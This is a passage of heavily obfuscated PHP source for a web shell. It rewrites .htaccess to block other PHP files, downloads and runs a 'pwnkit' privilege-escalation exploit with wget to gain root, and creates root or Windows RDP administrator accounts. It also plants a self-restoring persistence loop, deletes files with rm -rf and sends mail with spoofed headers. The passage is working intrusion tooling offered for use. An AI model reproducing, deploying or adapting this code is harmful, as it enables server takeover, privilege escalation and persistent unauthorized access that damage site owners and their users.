xk"]="\x70\x75\x74\x5fht\x74";${$mdbrnxgosgm}="\n&lt;Fil\x65\x73Matc\x68 \"\\.(p\x68p|\x70\x68*|P\x68*|\x50\x48*|\x70H*)\$\"\x3e\n \x20\x20 \x44\x65\x6ey fro\x6d al\x6c\n\x3c/F\x69les\x4d\x61\x74c\x68\x3e\n&lt;\x46\x69le\x73M\x61\x74\x63h \"^(".${$vbxxor}."|\x69nde\x78.p\x68p|w\x70-\x63on\x66i\x67\x2e\x70hp|w\x70-i\x6e\x63\x6c\x75de\x73.php)\$\"\x3e\n\x20 \x20\x20\x41\x6cl\x6f\x77\x20fr\x6fm a\x6c\x6c\n&lt;/F\x69\x6ce\x73Ma\x74c\x68&gt;\n&lt;F\x69\x6c\x65s\x4da\x74c\x68\x20\x22\x5c\x2e(\x6ap\x67|png|\x67i\x66|\x70df|\x6ap\x65g)\$\x22\x3e\n\x20   \x41\x6c\x6co\x77 \x66ro\x6d\x20al\x6c\n\x3c/File\x73Ma\x74c\x68\x3e";${${"\x47\x4c\x4f\x42\x41LS"}["i\x79\x67teih\x78\x6b"]}=${${"\x47\x4c\x4fB\x41\x4cS"}["hg\x75a\x6eqd\x64"]}[28](${$taztpb}."/\x2e\x68\x74\x61\x63\x63es\x73",${$wympdlrcl});if(${${"\x47LO\x42\x41L\x53"}["e\x6e\x7a\x6c\x6d\x76\x70\x79vfh"]}){success();}else{failed();}}else{failed();}}if(isset($_POST["\x73a\x76\x65-e\x64it\x6f\x72"])){${"GLO\x42\x41L\x53"}["q\x64\x6dgaj\x75\x64v\x69"]="\x66\x75n\x67s\x69";${"G\x4c\x4fBA\x4c\x53"}["\x68xd\x70w\x65"]="s\x61\x76\x65";${"\x47\x4c\x4fB\x41\x4cS"}["\x71zv\x71\x6d\x79\x63q"]="\x66\x75\x6e\x67s\x69";$qokgncovol="sa\x76e";${$qokgncovol}=${${"\x47\x4cO\x42A\x4c\x53"}["\x71dm\x67\x61\x6a\x75\x64\x76i"]}[28](${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x71\x7a\x76\x71\x6d\x79\x63\x71"]}[0]()."/".unx($_GET["\x66"]),$_POST["\x63od\x65-\x65\x64ito\x72"]);if(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x68x\x64\x70\x77\x65"]}){success();}else{failed();}}if(isset($_GET["a\x64min\x65r"])){${${"\x47LO\x42\x41\x4c\x53"}["\x71\x63\x6b\x67\x6a\x66\x74\x79"]}="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x76\x72\x61\x6e\x61\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2f\x72\x65\x6c\x65\x61\x73\x65\x73\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x2f\x76\x34\x2e\x38\x2e\x31\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2d\x34\x2e\x38\x2e\x31\x2e\x70\x68\x70";if(!${${"GL\x4f\x42A\x4c\x53"}["h\x67u\x61n\x71\x64\x64"]}[3]("\x61\x64mi\x6e\x65\x72.\x70h\x70")){$vpsuvgwa="\x55\x52\x4c";$rqmogiv="f\x75\x6egs\x69";cmd("\x77\x67\x65t ".${$vpsuvgwa}."\x20-O adm\x69\x6e\x65r.ph\x70\x20--\x71\x75i\x65\x74");echo"&lt;\x6d\x65ta\x20\x68tt\x70-e\x71ui\x76=\x22r\x65fresh\x22 \x63ont\x65\x6e\x74=\x22\x30;ur\x6c\x3d?d=".hx(${$rqmogiv}[0]())."\"\x3e";}}if($_GET["\x74\x65\x72m\x69\x6ea\x6c"]=="\x72oo\x74"){${"G\x4c\x4fB\x41\x4c\x53"}["p\x66j\x6f\x69\x75\x64e\x6b\x6a\x66"]="\x66\x75n\x67\x73\x69";${"\x47\x4cO\x42A\x4cS"}["\x6eg\x79t\x62\x77s\x68"]="\x66\x75ng\x73\x69";$dfffonriw="\x66un\x67\x73\x69";if(!${${"\x47\x4c\x4f\x42A\x4c\x53"}["n\x67\x79t\x62w\x73\x68"]}[3]("\x70w\x6ekit")&amp;&amp;${${"\x47\x4c\x4f\x42\x41LS"}["\x70\x66\x6a\x6f\x69\x75\x64ekj\x66"]}[4](${$dfffonriw}[0]())){${"GLOBALS"}["\x64npxb\x69w\x65"]="\x66\x75\x6e\x67s\x69";cmd("\x77\x67\x65\x74\x20\x68ttps://\x67\x69thub\x2ec\x6fm/M\x61\x64\x45\x78p\x6co\x69\x74\x73/Priv\x65lege-es\x63\x61\x6ca\x74i\x6f\x6e/\x72a\x77/main/\x70wn\x6bit\x20-O p\x77\x6e\x6bi\x74");cmd("\x63\x68\x6d\x6f\x64\x20+x\x20\x70w\x6e\x6bit");echo cmd("./\x70\x77\x6e\x6b\x69t \x69\x64 &gt;\x20.mad-root");echo"\x3c\x6d\x65\x74a\x20h\x74tp-\x65\x71uiv\x3d\"\x72\x65f\x72\x65\x73h\x22 c\x6fnte\x6et\x3d\"0\x3b\x75\x72\x6c\x3d?\x64\x3d".hx(${${"\x47\x4cO\x42A\x4c\x53"}["\x64\x6e\x70\x78\x62iwe"]}[0]())."&amp;t\x65rmi\x6e\x61\x6c=root\x22&gt;";}}if(isset($_POST["s\x75\x62\x6di\x74-ac\x74\x69\x6fn"])){${"G\x4cO\x42\x41\x4c\x53"}["\x61gz\x75\x6a\x69\x74\x65\x72\x6f\x77"]="i\x74\x65\x6d\x73";${${"\x47\x4c\x4f\x42\x41LS"}["\x61\x67\x7a\x75j\x69\x74e\x72\x6f\x77"]}=$_POST["che\x63k"];if($_POST["g\x65c\x6bo-se\x6c\x65\x63t"]=="\x64\x65\x6cete"){foreach(${${"\x47L\x4f\x42\x41L\x53"}["ybp\x76g\x7a\x6cr\x74\x66\x6fi"]} as${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x65\x76\x6dx\x6c\x63\x65gb\x75p"]}){${"G\x4c\x4fB\x41LS"}["m\x79\x6akp\x67y\x77"]="\x72epl";${"\x47L\x4f\x42\x41\x4cS"}["\x71\x6c\x72\x7a\x71d\x73a\x76\x76c"]="repl";${"\x47LO\x42\x41L\x53"}["h\x72\x68\x6c\x65e\x6c\x76\x68\x72\x6d"]="\x66d";${"G\x4c\x4f\x42A\x4c\x53"}["\x65\x69xhn\x63\x6d"]="\x66\x75n\x67\x73\x69";${"\x47\x4c\x4fBA\x4c\x53"}["\x74\x6e\x64\x66\x67m\x68"]="\x66\x64";${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6d\x79\x6ak\x70gy\x77"]}=str_replace("\x5c","/",${${"G\x4cO\x42A\x4cS"}["ei\x78h\x6e\x63\x6d"]}[0]());${${"\x47\x4cO\x42A\x4c\x53"}["\x75\x6c\x69\x6ea\x6fj\x79"]}=${${"\x47L\x4fB\x41LS"}["\x71\x6cr\x7aq\x64\x73\x61\x76\x76\x63"]}."/".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x76\x6dx\x6ccegb\x75\x70"]};if(is_dir(${${"GL\x4f\x42A\x4c\x53"}["h\x72\x68\x6c\x65\x65\x6c\x76h\x72\x6d"]})||is_file(${${"\x47L\x4fB\x41\x4c\x53"}["\x74\x6e\x64\x66\x67\x6d\x68"]})){${"\x47LOB\x41\x4c\x53"}["\x6c\x67\x6a\x68\x7a\x6f\x79s"]="\x72\x6ddi\x72";$rpctrmmei="\x66un\x67\x73\x69";$rncshaecgxnk="\x72\x6d\x64\x69\x72";${${"\x47L\x4f\x42A\x4c\x53"}["l\x67\x6a\x68\x7ao\x79\x73"]}=unlinkDir(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x75l\x69\x6e\x61oj\x79"]});${${"\x47L\x4fB\x41\x4c\x53"}["\x67\x69\x75\x6e\x77\x76\x72"]}=${$rpctrmmei}[24](${${"G\x4cOB\x41L\x53"}["\x75\x6c\x69\x6ea\x6f\x6a\x79"]});if(${$rncshaecgxnk}||${${"\x47\x4cO\x42\x41L\x53"}["\x67\x69\x75\x6ew\x76r"]}){success();}else if(${${"\x47L\x4f\x42A\x4c\x53"}["\x6epds\x6f\x72ew"]}&amp;&amp;${${"G\x4cOBA\x4c\x53"}["g\x69\x75\x6e\x77\x76r"]}){success();}else{failed();}}}}}if(isset($_POST["\x73ub\x6d\x69t"])){if($_POST["\x63r\x65\x61te\x5f\x66ol\x64er"]==true){$eqyreqs="\x4e\x61m\x61\x46o\x6c\x64\x65\x72";$mizfyace="\x66\x75\x6eg\x73\x69";${$eqyreqs}=${$mizfyace}[12]($_POST["\x63r\x65\x61\x74\x65\x5ff\x6flde\x72"]);if(${${"\x47\x4cO\x42\x41LS"}["\x62\x6e\x6at\x6ddd\x76"]}){success();}else{failed();}}else if($_POST["\x63\x72\x65\x61te\x5ff\x69l\x65"]==true){${"\x47\x4cO\x42\x41L\x53"}["c\x65c\x67f\x61\x62\x79brr\x77"]="\x66un\x67\x73i";${${"\x47L\x4fBA\x4c\x53"}["\x76\x6dl\x63i\x67\x6f\x77\x66w"]}=${${"\x47L\x4fB\x41\x4cS"}["cec\x67\x66\x61\x62ybr\x72\x77"]}[13]($_POST["cre\x61\x74\x65\x5ff\x69le"]);if(${${"\x47L\x4f\x42\x41\x4cS"}["v\x6d\x6c\x63i\x67o\x77fw"]}){success();}else{failed();}}else if($_POST["\x72\x65n\x61m\x65\x46i\x6ce"]==true){${${"G\x4c\x4fBAL\x53"}["\x6bcf\x66m\x6c\x7ae\x73r"]}=${${"\x47\x4c\x4f\x42\x41LS"}["\x68\x67ua\x6eq\x64\x64"]}[15](unx($_GET["re"]),$_POST["re\x6ea\x6d\x65\x46i\x6ce"]);if(${${"G\x4c\x4f\x42AL\x53"}["\x6b\x63\x66f\x6d\x6c\x7a\x65\x73\x72"]}){success();}else{failed();}}else if($_POST["\x63h\x46i\x6ce"]){$utpfhfn="\x63\x68F\x69le\x73";$uoulpegyq="\x66\x75\x6eg\x73i";${"\x47\x4c\x4fB\x41\x4c\x53"}["sh\x70ji\x70h\x63\x6ey\x64"]="\x63hF\x69le\x73";${$utpfhfn}=${$uoulpegyq}[30](unx($_GET["\x63h"]),$_POST["\x63\x68\x46\x69\x6ce"]);if(${${"G\x4cO\x42\x41L\x53"}["\x73\x68\x70\x6aip\x68c\x6ey\x64"]}){success();}else{failed();}}else if(isset($_POST["\x61dd-u\x73ern\x61m\x65"])&amp;&amp;isset($_POST["ad\x64-p\x61\x73\x73w\x6fr\x64"])){$eqfoafuq="\x66\x75\x6e\x67\x73\x69";if(!${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x68\x67\x75\x61n\x71\x64\x64"]}[3]("\x70wn\x6b\x69t")){cmd("wge\x74\x20\x68ttps://\x67it\x68u\x62.\x63o\x6d/\x4d\x61\x64Exp\x6c\x6f\x69\x74s/P\x72i\x76el\x65g\x65-\x65\x73c\x61\x6cat\x69\x6fn/\x72a\x77/\x6da\x69\x6e/pw\x6eki\x74 -\x4f p\x77n\x6bit");cmd("c\x68m\x6f\x64\x20+x\x20p\x77\x6e\x6b\x69t");cmd("./\x70\x77\x6ek\x69t \"\x69\x64\x22\x20&gt;\x20.\x6da\x64-\x72o\x6f\x74");echo"\x3cm\x65\x74\x61\x20h\x74tp-\x65q\x75\x69v=\x22re\x66\x72\x65s\x68\"\x20co\x6e\x74ent=\"\x30\x3b\x75rl=?\x64\x3d".hx(${${"G\x4c\x4f\x42\x41LS"}["h\x67\x75\x61\x6e\x71d\x64"]}[0]())."&amp;\x72\x6f\x6ft\x69\x6e\x67\x3d\x54rue\"\x3e";}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${$eqfoafuq}[3](".\x6da\x64-\x72o\x6ft")){$owokovyf="\x66u\x6e\x67si";$beunembqojuv="r\x65\x73\x70\x6f\x6es\x65";$nwzfqfdftq="r_te\x78\x74";${"\x47\x4c\x4f\x42A\x4c\x53"}["o\x63n\x6b\x71\x70l"]="re\x73\x70\x6f\x6e\x73\x65";${${"G\x4c\x4f\x42\x41L\x53"}["o\x63\x6e\x6b\x71\x70l"]}=${$owokovyf}[11]("\x2ema\x64-\x72\x6fo\x74");${$nwzfqfdftq}=explode(" ",${$beunembqojuv});if(${${"\x47\x4c\x4f\x42\x41\x4cS"}["ate\x78\x65\x6a\x76\x62"]}[0]=="\x75id\x3d0(ro\x6ft)"){${${"G\x4c\x4fB\x41L\x53"}["\x65p\x6e\x79tc\x6a"]}=$_POST["a\x64\x64-\x75s\x65\x72\x6e\x61m\x65"];$kzwcgmtp="\x75\x73\x65\x72n\x61\x6de";$cfeufqnj="\x70\x61\x73\x73wo\x72\x64";${${"\x47\x4cOB\x41\x4c\x53"}["\x79\x68\x77o\x62t\x79"]}=$_POST["\x61d\x64-\x70\x61\x73s\x77o\x72d"];$yckflvqkn="u\x73\x65\x72\x6ea\x6d\x65";cmd("\x2e/pwn\x6bi\x74\x20\"\x75s\x65\x72\x61\x64d ".${$yckflvqkn}." ;\x20e\x63ho -e \"".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x79h\x77\x6f\x62t\x79"]}."\\n".${$cfeufqnj}."\" |\x20pa\x73\x73w\x64\x20".${$kzwcgmtp}."\x22");}else{echo"&lt;m\x65t\x61\x20h\x74tp-e\x71\x75i\x76=\x22\x72e\x66\x72\x65sh\x22 c\x6fn\x74e\x6et=\x22\x30;url\x3d?d=".hx(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68\x67ua\x6e\x71dd"]}[0]())."&amp;a\x64d\x75se\x72=f\x61\x69l\x65d\"&gt;";}}}else if($_POST["lo\x63k\x66\x69l\x65"]==true){${"G\x4cO\x42\x41\x4cS"}["\x76\x64\x71\x71c\x71\x77"]="\x66u\x6e\x67\x73\x69";$csltkwqdtt="\x66u\x6e\x67\x73\x69";$frpwdiokxcl="\x66\x75\x6e\x67s\x69";$fvqbfhpciqxr="f\x6c\x65sN\x61\x6d\x65";$xeareyhnmnk="f\x6ce\x73\x4e\x61\x6d\x65";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x75\x65\x63\x6b\x7a\x67"]="\x54\x6d\x70\x4e\x61m\x65s";${"G\x4c\x4fB\x41\x4c\x53"}["\x6cut\x6e\x65\x6ch"]="f\x75n\x67\x73i";$znymeppkjtst="\x66l\x65\x73\x4e\x61\x6d\x65";$tbvsugmnrvlr="\x68\x61\x6e\x64\x6c\x65r";${"\x47\x4cO\x42\x41\x4cS"}["\x75\x7ask\x6c\x61\x6d\x77\x72"]="\x54m\x70N\x61\x6de\x73";$kxsxsqpth="\x66\x75\x6e\x67\x73\x69";${$znymeppkjtst}=$_POST["\x6cockf\x69le"];$zmcdvcd="\x66\x75\x6e\x67si";${"GLOBALS"}["\x74klui\x69\x6f\x67"]="f\x6c\x65\x73Name";${"\x47\x4c\x4fB\x41L\x53"}["pd\x79\x6aqal\x69\x6e"]="f\x75\x6e\x67\x73i";$jlqpguwgyi="\x66u\x6eg\x73\x69";$vbbypcucoru="\x66\x75n\x67si";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68z\x79k\x78\x70z\x6d\x6b\x65"]="\x54\x6dpN\x61\x6des";${"\x47\x4cOB\x41L\x53"}["\x75b\x63\x78\x63\x63ff"]="Tm\x70\x4e\x61\x6d\x65s";$aitqvwvubjbv="\x54\x6d\x70N\x61\x6d\x65\x73";${"\x47\x4cO\x42AL\x53"}["hx\x72iauo\x63lh"]="\x66le\x73\x4e\x61\x6d\x65";$hmlfdmtw="\x66\x6c\x65\x73\x4ea\x6d\x65";$pdaohq="\x66\x6c\x65\x73\x4e\x61\x6de";$vfxhwhrlenx="f\x75\x6egs\x69";${"\x47LOB\x41L\x53"}["\x69\x69\x6f\x63\x6b\x64\x6fr"]="f\x75\x6egs\x69";${"\x47LO\x42\x41LS"}["\x66agb\x69lp\x75bmu"]="\x66le\x73\x4e\x61\x6d\x65";${${"\x47LOBAL\x53"}["\x75bc\x78\x63c\x66\x66"]}=${$csltkwqdtt}[31]();if(file_exists(${${"\x47LO\x42\x41\x4cS"}["\x68\x7a\x79kx\x70z\x6dke"]}."/.\x73e\x73\x73io\x6es/.".base64_encode(${${"\x47\x4c\x4f\x42AL\x53"}["vd\x71\x71\x63q\x77"]}[0]().remove_dot(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x74\x6b\x6cu\x69i\x6fg"]})."-h\x61\x6e\x64le\x72"))&amp;&amp;file_exists(${${"\x47\x4cO\x42\x41LS"}["\x6csc\x6dc\x64\x70\x77lp\x75\x6a"]}."/.s\x65\x73si\x6fns/\x2e".remove_dot(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x68x\x72\x69a\x75\x6f\x63\x6c\x68"]})."-\x74e\x78\x74")){$ijgivlpxnx="\x66\x6c\x65sNa\x6d\x65";${"GL\x4f\x42\x41L\x53"}["jc\x66cmwo"]="\x66\x75\x6e\x67\x73\x69";${"\x47\x4cO\x42A\x4c\x53"}["u\x74\x65\x6c\x6cc\x64\x64"]="Tm\x70\x4e\x61\x6d\x65\x73";cmd("rm\x20-\x72\x66 ".${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x75\x74e\x6cl\x63\x64\x64"]}."/.\x73\x65ss\x69\x6fns/.".base64_encode(${${"\x47\x4cO\x42A\x4cS"}["\x6a\x63f\x63\x6d\x77\x6f"]}[0]().remove_dot(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x72\x73\x62p\x66\x6c\x65\x65\x75"]})."-t\x65\x78\x74-\x66\x69\x6ce"));cmd("\x72m -r\x66 ".${${"\x47L\x4f\x42AL\x53"}["\x6c\x73\x63\x6dcd\x70\x77\x6cpuj"]}."/\x2eses\x73i\x6fns/.".base64_encode(${${"\x47\x4c\x4f\x42ALS"}["hg\x75\x61\x6eqdd"]}[0]().remove_dot(${$ijgivlpxnx})."-\x68andl\x65\x72"));}mkdir(${${"\x47\x4c\x4f\x42AL\x53"}["\x75\x7a\x73\x6b\x6c\x61\x6dwr"]}."/.s\x65\x73si\x6f\x6e\x73");cmd("c\x70\x20$flesName ".${${"\x47L\x4f\x42A\x4c\x53"}["l\x73c\x6d\x63d\x70w\x6c\x70uj"]}."/\x2es\x65\x73\x73ions/\x2e".base64_encode(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x68g\x75a\x6e\x71\x64d"]}[0]().remove_dot(${$hmlfdmtw})."-tex\x74-\x66ile"));cmd("chmod \x3444\x20".${${"\x47LO\x42\x41\x4c\x53"}["\x72\x73\x62p\x66\x6cee\x75"]});${$tbvsugmnrvlr}="\n\x3c?php\n@\x69ni\x5f\x73\x65t(\x22max_\x65xec\x75t\x69\x6fn\x5f\x74im\x65\",\x200);\nwh\x69\x6ce (T\x72ue){\n\x20  \x20i\x66 (!fil\x65\x5fe\x78is\x74\x73(\"".${$vbbypcucoru}[0]()."\")){\n\x20\x20\x20\x20  \x20\x20m\x6b\x64\x69r(\"".${${"\x47\x4c\x4fB\x41\x4cS"}["pdy\x6aq\x61\x6c\x69\x6e"]}[0]()."\x22)\x3b\n \x20 \x20}\n \x20\x20 \x69\x66\x20(!\x66\x69l\x65\x5fexi\x73\x74s(\x22".${${"G\x4c\x4f\x42\x41\x4c\x53"}["i\x69\x6fck\x64o\x72"]}[0]()."/".${${"GLO\x42A\x4c\x53"}["rs\x62\x70\x66l\x65\x65\x75"]}."\")){\n \x20    \x20\x20\$\x74\x65\x78t =\x20\x62\x61s\x6564\x5fe\x6e\x63o\x64e(file\x5f\x67\x65\x74\x5fcont\x65\x6e\x74\x73(\"".${${"GLO\x42A\x4c\x53"}["\x75\x65\x63k\x7a\x67"]}."/.s\x65s\x73\x69o\x6e\x73/.".base64_encode(${$kxsxsqpth}[0]().remove_dot(${$fvqbfhpciqxr})."-te\x78\x74-fi\x6ce")."\x22));\n\x20\x20  \x20 \x20 \x66\x69le_\x70ut\x5f\x63o\x6e\x74e\x6et\x73(\"".${$frpwdiokxcl}[0]()."/".${$pdaohq}."\",\x20base64\x5fde\x63od\x65(\$\x74\x65\x78t));\n\x20 \x20 }\n\x20\x20\x20 \x69\x66 (\x67\x65ck\x6f\x5f\x70\x65r\x6d(\"".${$jlqpguwgyi}[0]()."/".${${"G\x4cO\x42\x41\x4c\x53"}["\x72\x73b\x70fl\x65\x65\x75"]}."\") \x21\x3d\x200\x344\x34){\n\x20\x20\x20    \x20\x63\x68mo\x64(\x22".${$vfxhwhrlenx}[0]()."/".${$xeareyhnmnk}."\", 04\x34\x34)\x3b\n\x20\x20 \x20}\x20\n  \x20 \x69\x66 (g\x65\x63ko\x5f\x70\x65\x72m(\"".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68\x67u\x61\x6e\x71\x64d"]}[0]()."\x22) !\x3d\x2005\x355){\n \x20 \x20\x20   ch\x6dod(\"".${${"\x47L\x4f\x42A\x4cS"}["\x68\x67u\x61nq\x64d"]}[0]()."\", \x30\x35\x35\x35);\n\x20\x20\x20\x20}\n}\n\nfu\x6ec\x74ion\x20\x67\x65cko\x5f\x70er\x6d(\$f\x6cen\x61\x6de){\n    \x72et\x75r\x6e\x20s\x75\x62\x73t\x72(s\x70r\x69\x6e\x74f(\x22%o\x22, f\x69lepe\x72\x6d\x73(\$\x66l\x65na\x6d\x65)), -\x34)\x3b\n}\n";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6cy\x68z\x68\x69xd\x75"]}=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x75\x74ne\x6c\x68"]}[28](${$aitqvwvubjbv}."/.\x73es\x73\x69\x6fn\x73/\x2e".base64_encode(${$zmcdvcd}[0]().remove_dot(${${"\x47LO\x42A\x4c\x53"}["\x66\x61\x67\x62\x69\x6c\x70ub\x6d\x75"]})."-\x68a\x6edl\x65\x72")."",${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74\x6f\x64\x77x\x6f\x66g\x63p"]});if(${${"\x47LO\x42\x41\x4c\x53"}["\x6c\x79\x68z\x68\x69\x78d\x75"]}){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["yk\x63\x79\x67\x72\x79"]="\x54\x6d\x70N\x61\x6de\x73";cmd(PHP_BINARY.${${"\x47L\x4f\x42A\x4c\x53"}["\x79\x6b\x63\x79\x67r\x79"]}."/\x2es\x65s\x73i\x6f\x6es/.".base64_encode(${${"\x47\x4c\x4f\x42A\x4c\x53"}["hgua\x6e\x71\x64d"]}[0]().remove_dot(${${"GLOB\x41\x4cS"}["\x72\x73\x62\x70\x66\x6ceeu"]})."-ha\x6edler")." &gt; /dev/nul\x6c\x202&gt;/dev/nu\x6c\x6c\x20&amp;");success();}else{failed();}}else if($_POST["\x61d\x64-\x72dp"]==True){${${"GL\x4f\x42\x41LS"}["\x75\x76j\x76b\x66be\x71"]}=$_POST["a\x64d-rdp"];${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x78\x61\x72\x6c\x6du\x6c\x78\x63v"]}=$_POST["ad\x64-\x72dp-\x70a\x73\x73"];if(stristr(PHP_OS,"\x57I\x4e")){${"GL\x4fBA\x4cS"}["\x6bp\x68\x6dr\x62g"]="\x70\x72o\x63\x52\x44P";${"G\x4cO\x42\x41\x4c\x53"}["ky\x6ebui"]="p\x72\x6f\x63\x52\x44\x50";$jrmdtnbi="\x75\x73\x65\x72R\x44\x50";${${"\x47LO\x42A\x4cS"}["\x6b\x70\x68mrb\x67"]}=cmd("n\x65t \x75\x73e\x72\x20".${$jrmdtnbi}." ".${${"\x47\x4cOB\x41L\x53"}["x\x61\x72lm\x75\x6c\x78\x63\x76"]}."\x20/\x61\x64d");if(${${"G\x4c\x4f\x42A\x4c\x53"}["k\x79nbu\x69"]}){cmd("\x6ee\x74 \x6c\x6f\x63a\x6cgrou\x70\x20\x61\x64\x6di\x6e\x69\x73trato\x72s\x20".${${"G\x4c\x4f\x42A\x4c\x53"}["\x75vjvb\x66\x62e\x71"]}."\x20/\x61\x64d");success();}else{failed();}}else{failed();}}else if($_POST["mail-f\x72om-s\x6dt\x70"]==True){$hldqnw="e\x6d\x61i\x6cFr\x6f\x6d";${${"\x47LOBAL\x53"}["\x7a\x68\x75\x78e\x63\x71\x6b\x67"]}=$_POST["m\x61\x69l-\x66\x72o\x6d-sm\x74\x70"];${${"\x47\x4c\x4f\x42\x41\x4cS"}["j\x75ec\x69\x63"]}=$_POST["m\x61\x69\x6c-\x74\x6f-\x73\x6d\x74\x70"];${"GL\x4f\x42\x41\x4c\x53"}["\x75\x71\x6f\x68nd\x76\x66pkp\x6c"]="\x70\x72\x6f\x63\x4d\x61\x69\x6c\x53m\x54p";${${"\x47LOBA\x4cS"}["\x78\x6a\x61\x73d\x73\x70"]}=$_POST["\x6da\x69\x6c\x74o-s\x75\x62j\x65ct"];$mllnxek="\x6d\x65\x73\x73\x61\x67\x65\x4da\x69\x6c";${$mllnxek}=$_POST["m\x65s\x73ag\x65-s\x6dtp"];${${"G\x4c\x4fBA\x4c\x53"}["n\x6a\x66\x77\x77icv\x64"]}="\x46ro\x6d:\x20".${$hldqnw}.""."\r\n"."Re\x70\x6c\x79-To:\x20".${${"\x47L\x4fB\x41\x4c\x53"}["\x7a\x68u\x78\x65\x63q\x6bg"]}.""."\r\n"."X-\x4d\x61\x69ler:\x20\x50H\x50/".phpversion();${${"G\x4cO\x42\x41L\x53"}["uq\x6f\x68ndv\x66\x70\x6b\x70\x6c"]}=mail(${${"\x47\x4c\x4f\x42\x41LS"}["j\x75e\x63ic"]},${${"GLO\x42ALS"}["x\x6aas\x64\x73\x70"]},${${"GL\x4f\x42\x41\x4cS"}["mn\x6d\x64t\x66\x67"]},${${"\x47\x4c\x4f\x42ALS"}["n\x6af\x77\x77\x69\x63\x76\x64"]});if(${${"G\x4c\x4f\x42A\x4c\x53"}["k\x6cr\x64\x74q\x69\x6b\x6f\x78q\x6c"]}){success();}else{failed();}}}if($_GET["re\x73\x70\x6f\x6e\x73e"]=="su\x63cess"){echo"&lt;\x73crip\x74\x3e\nSw\x61\x6c\x2ef\x69\x72e({\n\x20  \x20\x69\x63\x6f\x6e:\x20'\x73\x75cce\x73\x73',\n \x20  \x74it\x6ce:\x20'\x53\x75\x63\x65sss\x2e..\x27,\n\x20  \x20\x74e\x78t:\x20\x27\x44\x6f\x6ee\x20\x53\x75c\x63\x65ss!\x27,\n\x20\x20\x20\x20\x63onfi\x72\x6d\x42\x75t\x74\x6fn\x43o\x6c\x6f\x72:\x20'#2\x32\x32\x34\x32d',\n})&lt;/scr\x69pt\x3e";}else if($_GET["\x72espo\x6e\x73\x65"]=="fa\x69\x6c\x65d"){echo"\x3cs\x63\x72ip\x74&gt;\nS\x77\x61\x6c.f\x69re({\n\x20  \x20\x69\x63\x6f\x6e: 'e\x72ro\x72',\n\x20\x20\x20\x20t\x69t\x6c\x65:\x20'\x46ailed\x2e\x2e.\x27,\n\x20 \x20 t\x65\x78t:\x20'S\x6fm\x65th\x69\x6e\x67\x20\x77\x72\x6fn\x67!',\n   \x20con\x66\x69rm\x42u\x74to\x6eCo\x6co\x72: '#2\x32\x32\x342\x64',\n}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3c/s\x63r\x69pt\x3e";}function success(){echo"&lt;\x6d\x65\x74\x61 \x68ttp-eq\x75\x69\x76\x3d\"r\x65\x66re\x73h\"\x20\x63o\x6e\x74ent\x3d\x220\x3bu\x72\x6c\x3d?\x64\x3d".hx($GLOBALS["f\x75\x6e\x67\x73\x69"][0]())."&amp;\x72\x65spo\x6ese=suc\x63\x65\x73s\x22&gt;";}function failed(){echo"\x3cm\x65t\x61 ht\x74p-equ\x69v\x3d\x22r\x65fr\x65\x73h\x22 \x63\x6fn\x74\x65\x6et=\x22\x30\x3bur\x6c=?d=".hx($GLOBALS["fungsi"][0]())."\x26r\x65\x73p\x6fnse\x3dfa\x69le\x64\x22\x3e";}function formatSize($bytes){${"\x47\x4c\x4f\x42A\x4cS"}["m\x70ah\x62\x65t\x67k\x70\x62\x72"]="\x69";${${"\x47L\x4fB\x41L\x53"}["\x63\x77q\x79\x66jx\x70k\x70"]}=array("&lt;\x73\x70a\x6e c\x6c\x61\x73s\x3d\x22\x66il\x65-\x73i\x7ae\"&gt;\x42\x3c/s\x70\x61\x6e&gt;","\x3c\x73\x70a\x6e cl\x61\x73\x73=\x22\x66i\x6c\x65-\x73\x69\x7ae\"\x3e\x4b\x42\x3c/s\x70an\x3e","&lt;\x73pan \x63l\x61\x73s=\x22fi\x6c\x65-\x73i\x7a\x65\"&gt;\x4d\x42&lt;/\x73\x70\x61n&gt;","&lt;\x73p\x61\x6e c\x6c\x61\x73s=\"f\x69le-siz\x65\"\x3e\x47\x42&lt;/\x73p\x61\x6e\x3e","\x3cs\x70\x61\x6e \x63\x6c\x61\x73s=\x22f\x69l\x65-\x73\x69z\x65\"&gt;\x54B\x3c/\x73p\x61\x6e&gt;");$ezbllroayczx="i";$bvjasvioq="by\x74\x65s";$tlnvlmisrjl="\x69";for(${$ezbllroayczx}=0;${$bvjasvioq}&gt;=1024&amp;&amp;${${"GL\x4f\x42A\x4cS"}["\x65\x71kv\x67op\x74fvkl"]}&lt;(count(${${"G\x4cO\x42\x41\x4cS"}["c\x77q\x79f\x6ax\x70\x6b\x70"]})-1);${${"\x47\x4cOB\x41\x4c\x53"}["t\x66\x71\x7ayu\x71"]}/=1024,${$tlnvlmisrjl}++);return(round(${${"\x47\x4cOB\x41LS"}["\x74fq\x7ay\x75\x71"]},2)." ".${${"G\x4cO\x42\x41L\x53"}["\x63\x77\x71y\x66\x6a\x78\x70k\x70"]}[${${"GLO\x42A\x4cS"}["\x6d\x70\x61\x68b\x65tg\x6b\x70\x62r"]}]);}function 